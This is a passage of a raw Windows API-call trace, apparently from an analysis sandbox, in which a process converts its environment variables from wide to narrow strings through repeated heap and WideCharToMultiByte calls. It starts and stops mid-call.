lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0085.956] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x25) returned 0x27abe8 [0085.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x27abe8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0085.957] GetLastError () returned 0x0 [0085.957] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280b60) returned 0x28 [0085.957] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280b60, Size=0x2c) returned 0x280b60 [0085.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0085.957] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x39) returned 0x275950 [0085.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x275950, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0085.957] GetLastError () returned 0x0 [0085.957] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280b60) returned 0x2c [0085.957] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280b60, Size=0x30) returned 0x280b60 [0085.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0085.957] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x280b98 [0085.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x280b98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0085.957] GetLastError () returned 0x0 [0085.957] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280b60) returned 0x30 [0085.957] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280b60, Size=0x34) returned 0x280bb8 [0085.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0085.957] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x280b60 [0085.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x280b60, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0085.957] GetLastError () returned 0x0 [0085.957] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280bb8) returned 0x34 [0085.957] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280bb8, Size=0x38) returned 0x280bb8 [0085.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0085.957] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe) returned 0x27e900 [0085.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x27e900, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0085.958] GetLastError () returned 0x0 [0085.958] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280bb8) returned 0x38 [0085.958] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280bb8, Size=0x3c) returned 0x280bb8 [0085.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0085.958] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x69) returned 0x280c00 [0085.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x280c00, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0085.958] GetLastError () returned 0x0 [0085.958] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280bb8) returned 0x3c [0085.958] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280bb8, Size=0x40) returned 0x280bb8 [0085.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0085.958] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x275998 [0085.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x275998, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0085.958] GetLastError () returned 0x0 [0085.958] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280bb8) returned 0x40 [0085.958] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280bb8, Size=0x44) returned 0x280c78 [0085.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0085.958] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x27f338 [0085.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x27f338, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0085.958] GetLastError () returned 0x0 [0085.958] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x44 [0085.958] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x48) returned 0x280c78 [0085.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0085.959] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1d) returned 0x27f360 [0085.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x27f360, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0085.959] GetLastError () returned 0x0 [0085.959] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x48 [0085.959] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x4c) returned 0x280c78 [0085.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0085.959] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x276d88 [0085.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x276d88, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0085.959] GetLastError () returned 0x0 [0085.959] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x4c [0085.959] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x50) returned 0x280c78 [0085.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.959] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x280bb8 [0085.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x280bb8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0085.959] GetLastError () returned 0x0 [0085.959] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x50 [0085.959] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x54) returned 0x280c78 [0085.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0085.959] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x280bd8 [0085.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x280bd8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0085.959] GetLastError () returned 0x0 [0085.959] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x54 [0085.959] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x58) returned 0x280c78 [0085.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0085.960] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x27f388 [0085.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x27f388, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0085.960] GetLastError () returned 0x0 [0085.960] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x58 [0085.960] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x5c) returned 0x280c78 [0085.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0085.960] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x27ac18 [0085.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x27ac18, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0085.960] GetLastError () returned 0x0 [0085.960] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x5c [0085.960] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x60) returned 0x280c78 [0085.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0085.960] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x27b2f0 [0085.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x27b2f0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0085.960] GetLastError () returned 0x0 [0085.960] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x60 [0085.961] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x64) returned 0x280c78 [0085.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.961] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x27f3b0 [0085.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x27f3b0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0085.961] GetLastError () returned 0x0 [0085.961] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x64 [0085.961] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x68) returned 0x280c78 [0085.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0085.961] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x276dd8 [0085.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x276dd8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0085.961] GetLastError () returned 0x0 [0085.961] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x68 [0085.961] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x6c) returned 0x280c78 [0085.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0085.961] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x280cf0 [0085.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x280cf0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0085.962] GetLastError () returned 0x0 [0085.962] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x6c [0085.962] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x70) returned 0x280c78 [0085.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0085.962] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xf) returned 0x27e918 [0085.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x27e918, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0085.962] GetLastError () returned 0x0 [0085.962] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280c78) returned 0x70 [0085.962] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280c78, Size=0x74) returned 0x280d10 [0085.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0085.962] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x280c78 [0085.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x280c78, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0085.962] GetLastError () returned 0x0 [0085.962] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280d10) returned 0x74 [0085.962] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x78) returned 0x280d10 [0085.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0085.962] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x27b328 [0085.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x27b328, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0085.962] GetLastError () returned 0x0 [0085.963] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280d10) returned 0x78 [0085.963] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x7c) returned 0x280d10 [0085.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0085.963] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x27b360 [0085.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x27b360, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0085.963] GetLastError () returned 0x0 [0085.963] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280d10) returned 0x7c [0085.963] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x80) returned 0x280d10 [0085.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0085.963] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x280c98 [0085.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x280c98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0085.963] GetLastError () returned 0x0 [0085.963] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280d10) returned 0x80 [0085.963] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x84) returned 0x280d10 [0085.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.963] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x27f3d8 [0085.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x27f3d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0085.963] GetLastError () returned 0x0 [0085.963] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280d10) returned 0x84 [0085.963] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x88) returned 0x280d10 [0085.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0085.963] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x27b398 [0085.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x27b398, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0085.963] GetLastError () returned 0x0 [0085.964] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280d10) returned 0x88 [0085.964] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x8c) returned 0x280d10 [0085.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.964] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x280cb8 [0085.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x280cb8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0085.964] GetLastError () returned 0x0 [0085.964] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280d10) returned 0x8c [0085.964] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x90) returned 0x280d10 [0085.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0085.964] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x280da8 [0085.964] WideCharToMultiByte (in: CodePage=0x0, 